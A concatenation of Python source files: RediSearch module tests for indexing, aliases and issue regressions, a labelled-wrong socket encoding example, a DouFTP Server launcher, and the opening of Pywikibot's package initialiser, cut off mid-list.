def normalize_row(row):
return to_dict(row)
def assertAggrowsEqual(env, exp, got):
env.assertEqual(exp[0], got[0])
env.assertEqual(len(exp), len(got))
# and now, it's just free form:
exp = sorted(to_dict(x) for x in exp[1:])
got = sorted(to_dict(x) for x in got[1:])
env.assertEqual(exp, got)
def assertResultsEqual(env, exp, got, inorder=True):
from pprint import pprint
# pprint(exp)
# pprint(got)
env.assertEqual(exp[0], got[0])
env.assertEqual(len(exp), len(got))
exp = list(grouper(exp[1:], 2))
got = list(grouper(got[1:], 2))
for x in range(len(exp)):
exp_did, exp_fields = exp[x]
got_did, got_fields = got[x]
env.assertEqual(exp_did, got_did, message="at position {}".format(x))
got_fields = to_dict(got_fields)
exp_fields = to_dict(exp_fields)
env.assertEqual(exp_fields, got_fields, message="at position {}".format(x))
def testAlterIndex(env):
env.cmd('FT.CREATE', 'idx', 'SCHEMA', 'f1', 'TEXT')
env.cmd('FT.ADD', 'idx', 'doc1', 1.0, 'FIELDS', 'f1', 'hello', 'f2', 'world')
env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'f2', 'TEXT')
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'FIELDS', 'f1', 'hello', 'f2', 'world')
for _ in env.retry_with_reload():
ret = env.cmd('FT.SEARCH', 'idx', 'world')
env.assertEqual([1, 'doc2', ['f1', 'hello', 'f2', 'world']], ret)
env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'f3', 'TEXT', 'SORTABLE')
for x in range(10):
env.cmd('FT.ADD', 'idx', 'doc{}'.format(x + 3), 1.0,
'FIELDS', 'f1', 'hello', 'f3', 'val{}'.format(x))
for _ in env.retry_with_reload():
# Test that sortable works
res = env.cmd('FT.SEARCH', 'idx', 'hello', 'SORTBY', 'f3', 'DESC')
exp = [12, 'doc12', ['f1', 'hello', 'f3', 'val9'], 'doc11', ['f1', 'hello', 'f3', 'val8'], 'doc10', ['f1', 'hello', 'f3', 'val7'], 'doc9', ['f1', 'hello', 'f3', 'val6'], 'doc8', ['f1', 'hello', 'f3', 'val5'], 'doc7', [
'f1', 'hello', 'f3', 'val4'], 'doc6', ['f1', 'hello', 'f3', 'val3'], 'doc5', ['f1', 'hello', 'f3', 'val2'], 'doc4', ['f1', 'hello', 'f3', 'val1'], 'doc3', ['f1', 'hello', 'f3', 'val0']]
assertResultsEqual(env, exp, res)
# Test that we can add a numeric field
env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'n1', 'NUMERIC')
env.cmd('FT.ADD', 'idx', 'docN1', 1.0, 'FIELDS', 'n1', 50)
env.cmd('FT.ADD', 'idx', 'docN2', 1.0, 'FIELDS', 'n1', 250)
for _ in env.retry_with_reload():
res = env.cmd('FT.SEARCH', 'idx', '@n1:[0 100]')
env.assertEqual([1, 'docN1', ['n1', '50']], res)
def testAlterValidation(env):
# Test that constraints for ALTER comand
env.cmd('FT.CREATE', 'idx1', 'SCHEMA', 'f0', 'TEXT')
for x in range(1, 32):
env.cmd('FT.ALTER', 'idx1', 'SCHEMA', 'ADD', 'f{}'.format(x), 'TEXT')
# OK for now.
# Should be too many indexes
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER',
'idx1', 'SCHEMA', 'ADD', 'tooBig', 'TEXT')
env.cmd('FT.CREATE', 'idx2', 'MAXTEXTFIELDS', 'SCHEMA', 'f0', 'TEXT')
# print env.cmd('FT.INFO', 'idx2')
for x in range(1, 50):
env.cmd('FT.ALTER', 'idx2', 'SCHEMA', 'ADD', 'f{}'.format(x + 1), 'TEXT')
env.cmd('FT.ADD', 'idx2', 'doc1', 1.0, 'FIELDS', 'f50', 'hello')
for _ in env.retry_with_reload():
ret = env.cmd('FT.SEARCH', 'idx2', '@f50:hello')
env.assertEqual([1, 'doc1', ['f50', 'hello']], ret)
env.cmd('FT.CREATE', 'idx3', 'SCHEMA', 'f0', 'text')
# Try to alter the index with garbage
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER', 'idx3',
'SCHEMA', 'ADD', 'f1', 'TEXT', 'f2', 'garbage')
ret = to_dict(env.cmd('ft.info', 'idx3'))
env.assertEqual(1, len(ret['fields']))
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER',
'nonExist', 'SCHEMA', 'ADD', 'f1', 'TEXT')
# test with no fields!
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER', 'idx2', 'SCHEMA', 'ADD')
def testIssue366_1(env):
if env.is_cluster():
raise unittest.SkipTest('ADDHASH unsupported!')
# Test random RDB regressions, see GH 366
env.cmd('FT.CREATE', 'idx1', 'SCHEMA', 'textfield', 'TEXT', 'numfield', 'NUMERIC')
env.hmset('foo', {'textfield': 'blah', 'numfield': 1})
env.cmd('FT.ADDHASH', 'idx1', 'foo', 1, 'replace')
env.cmd('FT.DEL', 'idx1', 'foo')
for _ in env.retry_with_reload():
pass # --just ensure it doesn't crash
def testIssue366_2(env):
# FT.CREATE atest SCHEMA textfield TEXT numfield NUMERIC
# FT.ADD atest anId 1 PAYLOAD '{"hello":"world"}' FIELDS textfield sometext numfield 1234
# FT.ADD atest anId 1 PAYLOAD '{"hello":"world2"}' REPLACE PARTIAL FIELDS numfield 1111
# shutdown
env.cmd('FT.CREATE', 'idx1', 'SCHEMA', 'textfield', 'TEXT', 'numfield', 'NUMERIC')
env.cmd('FT.ADD', 'idx1', 'doc1', 1, 'PAYLOAD', '{"hello":"world"}',
'FIELDS', 'textfield', 'sometext', 'numfield', 1234)
env.cmd('ft.add', 'idx1', 'doc1', 1,
'PAYLOAD', '{"hello":"world2"}',
'REPLACE', 'PARTIAL',
'FIELDS', 'textfield', 'sometext', 'numfield', 1111)
for _ in env.retry_with_reload():
pass #
def testIssue654(env):
# Crashes during FILTER
env.cmd('ft.create', 'idx', 'schema', 'id', 'numeric')
env.cmd('ft.add', 'idx', 1, 1, 'fields', 'id', 1)
env.cmd('ft.add', 'idx', 2, 1, 'fields', 'id', 2)
res = env.cmd('ft.search', 'idx', '*', 'filter', '@version', 0, 2)
def testReplaceReload(env):
env.cmd('FT.CREATE', 'idx2', 'SCHEMA', 'textfield', 'TEXT', 'numfield', 'NUMERIC')
# Create a document and then replace it.
env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'FIELDS', 'textfield', 's1', 'numfield', 99)
env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'REPLACE', 'PARTIAL',
'FIELDS', 'textfield', 's100', 'numfield', 990)
env.dump_and_reload()
# RDB Should still be fine
env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'REPLACE', 'PARTIAL',
'FIELDS', 'textfield', 's200', 'numfield', 1090)
doc = to_dict(env.cmd('FT.GET', 'idx2', 'doc2'))
env.assertEqual('s200', doc['textfield'])
env.assertEqual('1090', doc['numfield'])
# command = 'FT.CREATE idx SCHEMA '
# for i in range(255):
# command += 't%d NUMERIC SORTABLE ' % i
# command = command[:-1]
# r.execute_command(command)
# r.execute_command('save')
# // reload from ...
# r.execute_command('FT.ADD idx doc1 1.0 FIELDS t0 1')
def testIssue417(env):
command = ['ft.create', 'idx', 'schema']
for x in range(255):
command += ['t{}'.format(x), 'numeric', 'sortable']
command = command[:-1]
env.cmd(*command)
for _ in env.reloading_iterator():
try:
env.execute_command('FT.ADD', 'idx', 'doc1', '1.0', 'FIELDS', 't0', '1')
except redis.ResponseError as e:
env.assertTrue('already' in e.message.lower())
# >FT.CREATE myIdx SCHEMA title TEXT WEIGHT 5.0 body TEXT url TEXT
# >FT.ADD myIdx doc1 1.0 FIELDS title "hello world" body "lorem ipsum" url "www.google.com"
# >FT.SEARCH myIdx "no-as"
# Could not connect to Redis at 127.0.0.1:6379: Connection refused
# >FT.SEARCH myIdx "no-as"
# (error) Unknown Index name
def testIssue422(env):
env.cmd('ft.create', 'myIdx', 'schema',
'title', 'TEXT', 'WEIGHT', '5.0',
'body', 'TEXT',
'url', 'TEXT')
env.cmd('ft.add', 'myIdx', 'doc1', '1.0', 'FIELDS', 'title', 'hello world', 'bod', 'lorem ipsum', 'url', 'www.google.com')
rv = env.cmd('ft.search', 'myIdx', 'no-as')
env.assertEqual([0], rv)
def testIssue446(env):
env.cmd('ft.create', 'myIdx', 'schema',
'title', 'TEXT', 'SORTABLE')
env.cmd('ft.add', 'myIdx', 'doc1', '1.0', 'fields', 'title', 'hello world', 'body', 'lorem ipsum', 'url', '"www.google.com')
rv = env.cmd('ft.search', 'myIdx', 'hello', 'limit', '0', '0')
env.assertEqual([1], rv)
# Related - issue 635
env.cmd('ft.add', 'myIdx', 'doc2', '1.0', 'fields', 'title', 'hello')
rv = env.cmd('ft.search', 'myIdx', 'hello', 'limit', '0', '0')
env.assertEqual([2], rv)
def testTimeoutSettings(env):
env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'BLAHBLAH').raiseError()
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'RETURN').notRaiseError()
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'FAIL').notRaiseError()
def testAlias(env):
env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
env.cmd('ft.create', 'idx2', 'schema', 't1', 'text')
env.cmd('ft.aliasAdd', 'myIndex', 'idx')
env.cmd('ft.add', 'myIndex', 'doc1', 1.0, 'fields', 't1', 'hello')
r = env.cmd('ft.search', 'idx', 'hello')
env.assertEqual([1, 'doc1', ['t1', 'hello']], r)
r2 = env.cmd('ft.search', 'myIndex', 'hello')
env.assertEqual(r, r2)
# try to add the same alias again; should be an error
env.expect('ft.aliasAdd', 'myIndex', 'idx2').raiseError()
env.expect('ft.aliasAdd', 'alias2', 'idx').notRaiseError()
# now delete the index
env.cmd('ft.drop', 'myIndex')
# index list should be cleared now. This can be tested by trying to alias
# the old alias to different index
env.cmd('ft.aliasAdd', 'myIndex', 'idx2')
env.cmd('ft.aliasAdd', 'alias2', 'idx2')
env.cmd('ft.add', 'myIndex', 'doc2', 1.0, 'fields', 't1', 'hello')
r = env.cmd('ft.search', 'alias2', 'hello')
env.assertEqual([1L, 'doc2', ['t1', 'hello']], r)
# check that aliasing one alias to another returns an error. This will
# end up being confusing
env.expect('ft.aliasAdd', 'alias3', 'myIndex').raiseError()
# check that deleting the alias works as expected
env.expect('ft.aliasDel', 'myIndex').notRaiseError()
env.expect('ft.search', 'myIndex', 'foo').raiseError()
# create a new index and see if we can use the old name
env.cmd('ft.create', 'idx3', 'schema', 't1', 'text')
env.cmd('ft.add', 'idx3', 'doc3', 1.0, 'fields', 't1', 'foo')
env.cmd('ft.aliasAdd', 'myIndex', 'idx3')
# also, check that this works in rdb save
for _ in env.retry_with_rdb_reload():
r = env.cmd('ft.search', 'myIndex', 'foo')
env.assertEqual([1L, 'doc3', ['t1', 'foo']], r)
# Check that we can move an alias from one index to another
env.cmd('ft.aliasUpdate', 'myIndex', 'idx2')
r = env.cmd('ft.search', 'myIndex', "hello")
env.assertEqual([1L, 'doc2', ['t1', 'hello']], r)
# Test that things like ft.get, ft.aggregate, etc. work
r = env.cmd('ft.get', 'myIndex', 'doc2')
env.assertEqual(['t1', 'hello'], r)
r = env.cmd('ft.aggregate', 'myIndex', 'hello', 'LOAD', '1', '@t1')
env.assertEqual([1, ['t1', 'hello']], r)
r = env.cmd('ft.del', 'myIndex', 'doc2')
env.assertEqual(1, r)
def testNoCreate(env):
env.cmd('ft.create', 'idx', 'schema', 'f1', 'text')
env.expect('ft.add', 'idx', 'doc1', 1, 'nocreate', 'fields', 'f1', 'hello').raiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'nocreate', 'fields', 'f1', 'hello').raiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'fields', 'f1', 'hello').notRaiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'nocreate', 'fields', 'f1', 'world').notRaiseError()
# Standalone functionality
def testIssue484(env):
# Issue with split
# 127.0.0.1:6379> ft.drop productSearch1
# OK
# 127.0.0.1:6379> "FT.CREATE" "productSearch1" "NOSCOREIDX" "SCHEMA" "productid" "TEXT" "categoryid" "TEXT" "color" "TEXT" "timestamp" "NUMERIC"
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID1" "1.0" "REPLACE" "FIELDS" "productid" "1" "categoryid" "cars" "color" "blue" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID2" "1.0" "REPLACE" "FIELDS" "productid" "1" "categoryid" "small cars" "color" "white" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID3" "1.0" "REPLACE" "FIELDS" "productid" "2" "categoryid" "Big cars" "color" "white" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID4" "1.0" "REPLACE" "FIELDS" "productid" "2" "categoryid" "Big cars" "color" "green" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID5" "1.0" "REPLACE" "FIELDS" "productid" "3" "categoryid" "cars" "color" "blue" "categoryType" 0
# OK
# 127.0.0.1:6379> FT.AGGREGATE productSearch1 * load 2 @color @categoryid APPLY "split(format(\"%s-%s\",@color,@categoryid),\"-\")" as value GROUPBY 1 @value REDUCE COUNT 0 as value_count
env.cmd('ft.create', 'productSearch1', 'noscoreidx', 'schema', 'productid',
'text', 'categoryid', 'text', 'color', 'text', 'timestamp', 'numeric')
env.cmd('ft.add', 'productSearch1', 'GUID1', '1.0', 'REPLACE', 'FIELDS', 'productid', '1', 'categoryid', 'cars', 'color', 'blue', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID2', '1.0', 'REPLACE', 'FIELDS', 'productid', '1', 'categoryid', 'small cars', 'color', 'white', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID3', '1.0', 'REPLACE', 'FIELDS', 'productid', '2', 'categoryid', 'Big cars', 'color', 'white', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID4', '1.0', 'REPLACE', 'FIELDS', 'productid', '2', 'categoryid', 'Big cars', 'color', 'green', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID5', '1.0', 'REPLACE', 'FIELDS', 'productid', '3', 'categoryid', 'cars', 'color', 'blue', 'categoryType', 0)
res = env.cmd('FT.AGGREGATE', 'productSearch1', '*',
'load', '2', '@color', '@categoryid',
'APPLY', 'split(format("%s-%s",@color,@categoryid),"-")', 'as', 'value',
'GROUPBY', '1', '@value',
'REDUCE', 'COUNT', '0', 'as', 'value_count',
'SORTBY', '4', '@value_count', 'DESC', '@value', 'ASC')
expected = [6, ['value', 'white', 'value_count', '2'], ['value', 'cars', 'value_count', '2'], ['value', 'small cars', 'value_count', '1'], ['value', 'blue', 'value_count', '2'], ['value', 'Big cars', 'value_count', '2'], ['value', 'green', 'value_count', '1']]
assertAggrowsEqual(env, expected, res)
for var in expected:
env.assertIn(var, res)
def testIssue501(env):
env.cmd('FT.CREATE', 'incidents', 'SCHEMA', 'report', 'TEXT')
env.cmd('FT.ADD', 'incidents', 'doc1', 1.0, 'FIELDS', 'report', 'report content')
env.cmd('FT.DICTADD', 'slang', 'timmies', 'toque', 'toonie', 'serviette', 'kerfuffle', 'chesterfield')
rv = env.cmd('FT.SPELLCHECK', 'incidents', 'qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq',
'TERMS', 'INCLUDE', 'slang', 'TERMS', 'EXCLUDE', 'slang')
env.assertEqual("qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq", rv[0][1])
env.assertEqual([], rv[0][2])
def testIssue589(env):
env.cmd('FT.CREATE', 'incidents', 'SCHEMA', 'report', 'TEXT')
env.cmd('FT.ADD', 'incidents', 'doc1', 1.0, 'FIELDS', 'report', 'report content')
env.expect('FT.SPELLCHECK', 'incidents', 'report :').error().contains("Syntax error at offset")
def testIssue621(env):
env.expect('ft.create', 'test', 'SCHEMA', 'uuid', 'TAG', 'title', 'TEXT').equal('OK')
env.expect('ft.add', 'test', 'a', '1', 'REPLACE', 'PARTIAL', 'FIELDS', 'uuid', 'foo', 'title', 'bar').equal('OK')
env.expect('ft.add', 'test', 'a', '1', 'REPLACE', 'PARTIAL', 'FIELDS', 'title', 'bar').equal('OK')
env.expect('ft.search', 'test', '@uuid:{foo}').equal([1L, 'a', ['uuid', 'foo', 'title', 'bar']])
# Server crash on doc names that conflict with index keys #666
def testIssue666(env):
# We cannot reliably determine that any error will occur in cluster mode
# because of the key name
env.skipOnCluster()
env.cmd('ft.create', 'foo', 'schema', 'bar', 'text')
env.cmd('ft.add', 'foo', 'mydoc', 1, 'fields', 'bar', 'one two three')
# crashes here
with env.assertResponseError():
env.cmd('ft.add', 'foo', 'ft:foo/two', '1', 'fields', 'bar', 'four five six')
# try with replace:
with env.assertResponseError():
env.cmd('ft.add', 'foo', 'ft:foo/two', '1', 'REPLACE',
'FIELDS', 'bar', 'four five six')
with env.assertResponseError():
env.cmd('ft.add', 'foo', 'idx:foo', '1', 'REPLACE',
'FIELDS', 'bar', 'four five six')
env.cmd('ft.add', 'foo', 'mydoc1', 1, 'fields', 'bar', 'four five six')
# 127.0.0.1:6379> flushdb
# OK
# 127.0.0.1:6379> ft.create foo SCHEMA bar text
# OK
# 127.0.0.1:6379> ft.add foo mydoc 1 FIELDS bar "one two three"
# OK
# 127.0.0.1:6379> keys *
# 1) "mydoc"
# 2) "ft:foo/one"
# 3) "idx:foo"
# 4) "ft:foo/two"
# 5) "ft:foo/three"
# 127.0.0.1:6379> ft.add foo "ft:foo/two" 1 FIELDS bar "four five six"
# Could not connect to Redis at 127.0.0.1:6379: Connection refused
def testPrefixDeletedExpansions(env):
env.skipOnCluster()
env.cmd('ft.create', 'idx', 'schema', 'txt1', 'text', 'tag1', 'tag')
# get the number of maximum expansions
maxexpansions = int(env.cmd('ft.config', 'get', 'MAXEXPANSIONS')[0][1])
for x in range(maxexpansions):
env.cmd('ft.add', 'idx', 'doc{}'.format(x), 1, 'fields',
'txt1', 'term{}'.format(x), 'tag1', 'tag{}'.format(x))
for x in range(maxexpansions):
env.cmd('ft.del', 'idx', 'doc{}'.format(x))
env.cmd('ft.add', 'idx', 'doc_XXX', 1, 'fields', 'txt1', 'termZZZ', 'tag1', 'tagZZZ')
# r = env.cmd('ft.search', 'idx', 'term*')
# print(r)
# r = env.cmd('ft.search', 'idx', '@tag1:{tag*}')
# print(r)
tmax = time.time() + 0.5 # 250ms max
iters = 0
while time.time() < tmax:
iters += 1
env.cmd('ft.debug', 'gc_forceinvoke', 'idx')
r = env.cmd('ft.search', 'idx', '@txt1:term* @tag1:{tag*}')
if r[0]:
break
print 'did {} iterations'.format(iters)
r = env.cmd('ft.search', 'idx', '@txt1:term* @tag1:{tag*}')
env.assertEqual([1, 'doc_XXX', ['txt1', 'termZZZ', 'tag1', 'tagZZZ']], r)
def testOptionalFilter(env):
env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
for x in range(100):
env.cmd('ft.add', 'idx', 'doc_{}'.format(x), 1, 'fields', 't1', 'hello world word{}'.format(x))
print env.cmd('ft.explain', 'idx', '(~@t1:word20)')
# print(r)
r = env.cmd('ft.search', 'idx', '~(word20 => {$weight: 2.0})')
print(r)
def testIssue736(env):
# 1. create the schema, we need a tag field
env.cmd('ft.create', 'idx', 'schema', 't1', 'text', 'n2', 'numeric', 't2', 'tag')
# 2. create a single document to initialize at least one RSAddDocumentCtx
env.cmd('ft.add', 'idx', 'doc1', 1, 'fields', 't1', 'hello', 't2', 'foo, bar')
# 3. create a second document with many filler fields to force a realloc:
extra_fields = []
for x in range(20):
extra_fields += ['nidx_fld{}'.format(x), 'val{}'.format(x)]
extra_fields += ['n2', 'not-a-number', 't2', 'random, junk']
with env.assertResponseError():
env.cmd('ft.add', 'idx', 'doc2', 1, 'fields', *extra_fields)
def testCriteriaTesterDeactivated():
env = Env(moduleArgs='_MAX_RESULTS_TO_UNSORTED_MODE 1')
env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1, 'fields', 't1', 'hello1 hey hello2')
env.cmd('ft.add', 'idx', 'doc2', 1, 'fields', 't1', 'hello2 hey')
env.cmd('ft.add', 'idx', 'doc3', 1, 'fields', 't1', 'hey')
env.expect('ft.search', 'idx', '(hey hello1)|(hello2 hey)').equal([2L, 'doc1', ['t1', 'hello1 hey hello2'], 'doc2', ['t1', 'hello2 hey']])
def testIssue828(env):
env.cmd('ft.create', 'beers', 'SCHEMA',
'name', 'TEXT', 'PHONETIC', 'dm:en',
'style', 'TAG', 'SORTABLE',
'abv', 'NUMERIC', 'SORTABLE')
rv = env.cmd("FT.ADD", "beers", "802", "1.0",
"FIELDS", "index", "25", "abv", "0.049",
"name", "Hell or High Watermelon Wheat (2009)",
"style", "Fruit / Vegetable Beer")
env.assertEqual('OK', rv)
def testIssue862(env):
env.cmd('ft.create', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE')
rv = env.cmd("FT.ADD", "idx", "doc1", "1.0", "FIELDS", "test", "foo")
env.assertEqual('OK', rv)
rv = env.cmd("FT.SEARCH", "idx", "foo", 'WITHSORTKEYS')
env.assertEqual([1L, 'doc1', None, ['test', 'foo']], rv)
def testIssue_884(env):
env.expect('FT.create', 'idx', 'STOPWORDS', '0', 'SCHEMA', 'title', 'text', 'weight',
'50', 'subtitle', 'text', 'weight', '10', 'author', 'text', 'weight',
'10', 'description', 'text', 'weight', '20').equal('OK')
env.expect('FT.ADD', 'idx', 'doc4', '1.0', 'FIELDS', 'title', 'mohsin conversation the conversation tahir').equal('OK')
env.expect('FT.ADD', 'idx', 'doc3', '1.0', 'FIELDS', 'title', 'Fareham Civilization Church - Sermons and conversations mohsin conversation the').equal('OK')
env.expect('FT.ADD', 'idx', 'doc2', '1.0', 'FIELDS', 'title', 'conversation the conversation - a drama about conversation, the science of conversation.').equal('OK')
env.expect('FT.ADD', 'idx', 'doc1', '1.0', 'FIELDS', 'title', 'mohsin conversation with the mohsin').equal('OK')
env.expect('FT.SEARCH', 'idx', '@title:(conversation) (@title:(conversation the conversation))=>{$inorder: true;$slop: 0}').equal(
[2L, 'doc2', ['title', 'conversation the conversation - a drama about conversation, the science of conversation.'], 'doc4', ['title', 'mohsin conversation the conversation tahir']])
def testIssue_866(env):
env.expect('ft.sugadd', 'sug', 'test123', '1').equal(1)
env.expect('ft.sugadd', 'sug', 'test456', '1').equal(2)
env.expect('ft.sugdel', 'sug', 'test').equal(0)
env.expect('ft.sugget', 'sug', '').equal(['test123', 'test456'])
def testIssue_848(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test1', 'TEXT', 'SORTABLE').equal('OK')
env.expect('FT.ADD', 'idx', 'doc1', '1.0', 'FIELDS', 'test1', 'foo').equal('OK')
env.expect('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'test2', 'TEXT', 'SORTABLE').equal('OK')
env.expect('FT.ADD', 'idx', 'doc2', '1.0', 'FIELDS', 'test1', 'foo', 'test2', 'bar').equal('OK')
env.expect('FT.SEARCH', 'idx', 'foo', 'SORTBY', 'test2', 'ASC').equal([2L, 'doc2', ['test2', 'bar', 'test1', 'foo'], 'doc1', ['test1', 'foo']])
def testMod_309(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', 'test', 'TEXT', 'SORTABLE').equal('OK')
for i in range(100000):
env.expect('FT.ADD', 'idx', 'doc%d'%i, '1.0', 'FIELDS', 'test', 'foo').equal('OK')
res = env.cmd('FT.AGGREGATE', 'idx', 'foo')
env.assertEqual(len(res), 100001)
def testIssue_865(env):
env.expect('FT.CREATE', 'idx', 'SCHEMA', '1', 'TEXT', 'SORTABLE').equal('OK')
env.expect('ft.add', 'idx', 'doc1', '1.0', 'FIELDS', '1', 'foo1').equal('OK')
env.expect('ft.add', 'idx', 'doc2', '1.0', 'FIELDS', '1', 'foo2').equal('OK')
env.expect('ft.search', 'idx', 'foo*', 'SORTBY', '1', 'ASC').equal([2, 'doc1', ['1', 'foo1'], 'doc2', ['1', 'foo2']])
env.expect('ft.search', 'idx', 'foo*', 'SORTBY', '1', 'DESC').equal([2, 'doc2', ['1', 'foo2'], 'doc1', ['1', 'foo1']])
env.expect('ft.search', 'idx', 'foo*', 'SORTBY', '1', 'bad').error()
env.expect('ft.search', 'idx', 'foo*', 'SORTBY', 'bad', 'bad').error()
env.expect('ft.search', 'idx', 'foo*', 'SORTBY', 'bad').error()
env.expect('ft.search', 'idx', 'foo*', 'SORTBY').error()
def grouper(iterable, n, fillvalue=None):
"Collect data into fixed-length chunks or blocks"
from itertools import izip_longest
# grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
args = [iter(iterable)] * n
return izip_longest(fillvalue=fillvalue, *args)
def to_dict(r):
return {r[i]: r[i + 1] for i in range(0, len(r), 2)}
|
codecs_socket_fail.py
|
import sys
import socketserver
class Echo(socketserver.BaseRequestHandler):
def handle(self):
# Get some bytes and echo them back to the client.
data = self.request.recv(1024)
self.request.send(data)
return
if __name__ == '__main__':
import codecs
import socket
import threading
address = ('localhost', 0) # let the kernel assign a port
server = socketserver.TCPServer(address, Echo)
ip, port = server.server_address # what port was assigned?
t = threading.Thread(target=server.serve_forever)
t.setDaemon(True) # don't hang on exit
t.start()
# Connect to the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
# Send the data
# WRONG: Not encoded first!
text = 'français'
len_sent = s.send(text)
# Receive a response
response = s.recv(len_sent)
print(repr(response))
# Clean up
s.close()
server.socket.close()
|
douftpserver.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""DouFTP Server"""
from multiprocessing import Process, freeze_support
from os.path import dirname
import utils.global_variable as g
from app import App
# 全局变量
g.init()
g.set_item('APP_NAME', 'DouFTP Server')
g.set_item('APP_BOUNDLE_ID', 'org.douftp.server.desktop')
g.set_item('APP_DISPLAY_NAME', 'DouFTP Server 桌面端')
g.set_item('APP_VERSION', '0.0.1')
g.set_item('APP_COPYRIGHT', 'Copyright © 2018-2022 Crogram Inc.')
g.set_item('APP_PATH', dirname(__file__)) # 当前目录
# g.set_item('DATA_DIR', 'data')
g.set_item('APP_SITE', 'https://douftp.org?utm_source=desktop_server&version=0.0.1')
if __name__ == "__main__":
freeze_support()
Process(target=App).start()
# App()
|
__init__.py
|
# -*- coding: utf-8 -*-
"""The initialization file for the Pywikibot framework."""
#
# (C) Pywikibot team, 2008-2018
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, division, unicode_literals
__version__ = __release__ = '3.1.dev0'
__url__ = 'https://www.mediawiki.org/wiki/Manual:Pywikibot'
import atexit
import datetime
from decimal import Decimal
import math
import re
import sys
import threading
import time
from warnings import warn
from pywikibot._wbtypes import WbRepresentation as _WbRepresentation
from pywikibot.bot import (
input, input_choice, input_yn, inputChoice, handle_args, showHelp, ui,
calledModuleName, Bot, CurrentPageBot, WikidataBot,
# the following are flagged as deprecated on usage
handleArgs,
)
from pywikibot.bot_choice import (
QuitKeyboardInterrupt as _QuitKeyboardInterrupt,
)
from pywikibot import config2 as config
from pywikibot.data.api import UploadWarning as _UploadWarning
from pywikibot.diff import PatchManager
from pywikibot.exceptions import (
Error, InvalidTitle, BadTitle, NoPage, NoMoveTarget, SectionError,
SiteDefinitionError, NoSuchSite, UnknownSite, UnknownFamily,
UnknownExtension,
NoUsername, UserBlocked,
PageRelatedError, UnsupportedPage, IsRedirectPage, IsNotRedirectPage,
PageSaveRelatedError, PageNotSaved, OtherPageSaveError,
LockedPage, CascadeLockedPage, LockedNoPage, NoCreateError,
EditConflict, PageDeletedConflict, PageCreatedConflict,
ServerError, FatalServerError, Server504Error,
CaptchaError, SpamfilterError, TitleblacklistError,
CircularRedirect, InterwikiRedirectPage, WikiBaseError,
CoordinateGlobeUnknownException,
DeprecatedPageNotFoundError as _DeprecatedPageNotFoundError,
_EmailUserError,
)
from pywikibot.family import Family
from pywikibot.i18n import translate
from pywikibot.logging import (
critical, debug, error, exception, log, output, stdout, warning
)
from pywikibot.site import BaseSite
import pywikibot.textlib as textlib
from pywikibot.tools import (
# __ to avoid conflict with ModuleDeprecationWrapper._deprecated
classproperty,
deprecated as __deprecated,
deprecate_arg as _deprecate_arg,
normalize_username,
MediaWikiVersion as _MediaWikiVersion,
redirect_func,
ModuleDeprecationWrapper as _ModuleDeprecationWrapper,
PY2,
UnicodeMixin,
)
from pywikibot.tools.formatter import color_format
if sys.version_info[0] > 2:
from queue import Queue
long = int
basestring = str
else:
from Queue import Queue
textlib_methods = (
'unescape', 'replaceExcept', 'removeDisabledParts', 'removeHTMLParts',
'isDisabled', 'interwikiFormat', 'interwikiSort',
'getLanguageLinks', 'replaceLanguageLinks',
'removeLanguageLinks', 'removeLanguageLinksAndSeparator',
'getCategoryLinks', 'categoryFormat', 'replaceCategoryLinks',
'removeCategoryLinks', 'removeCategoryLinksAndSeparator',
'replaceCategoryInPlace', 'compileLinkR', 'extract_templates_and_params',
'TimeStripper',
)
__all__ = (
'config', 'ui', 'Site', 'UnicodeMixin', 'translate',
'Page', 'FilePage', 'Category', 'Link', 'User',
'ItemPage', 'PropertyPage', 'Claim',
'html2unicode', 'url2unicode', 'unicode2html',
'stdout', 'output', 'warning', 'error', 'critical', 'debug',
'exception', 'input_choice', 'input', 'input_yn', 'inputChoice',
